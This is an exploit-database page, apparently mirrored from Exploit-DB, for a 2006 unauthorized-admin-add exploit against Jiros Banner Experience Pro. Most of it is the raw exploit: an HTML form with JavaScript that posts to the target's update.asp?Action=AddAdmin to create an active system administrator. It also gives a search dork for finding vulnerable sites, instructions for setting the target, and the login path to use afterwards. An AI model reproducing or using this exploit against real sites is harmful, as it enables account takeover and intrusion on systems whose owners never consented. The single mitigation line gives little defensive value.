header-logo
Suggest Exploit
vendor:
Banner Experience Pro
by:
nukedx
7,5
CVSS
HIGH
Unauthorized Admin Add Exploit
264
CWE
Product Name: Banner Experience Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Jiros Banner Experience Pro Unauthorized Admin Add Exploit

This exploit allows an attacker to add an admin account to the Jiros Banner Experience Pro application without authorization. The attacker can use the given dork to find vulnerable sites and then use the exploit to add an admin account with the given username, email, and password. The exploit is triggered when the attacker submits the form.

Mitigation:

Ensure that only authorized users are able to add admin accounts to the application.
Source

Exploit-DB raw data:

<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter site!");
    return false;
  }
  if (confirm("Are you sure?")) {
    xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
    xplt.aName.value=document.xplt.aName.value;
    xplt.aEmail.value=document.xplt.aEmail.value;
    xplt.aPassword.value=document.xplt.aPassword.value;
    xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
    xplt.aIsActive=document.xplt.aIsActive.value;
    xplt.submit();
  }
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>

Save this code as .htm and then execute.

# nukedx.com [2006-03-07]

# milw0rm.com [2006-03-09]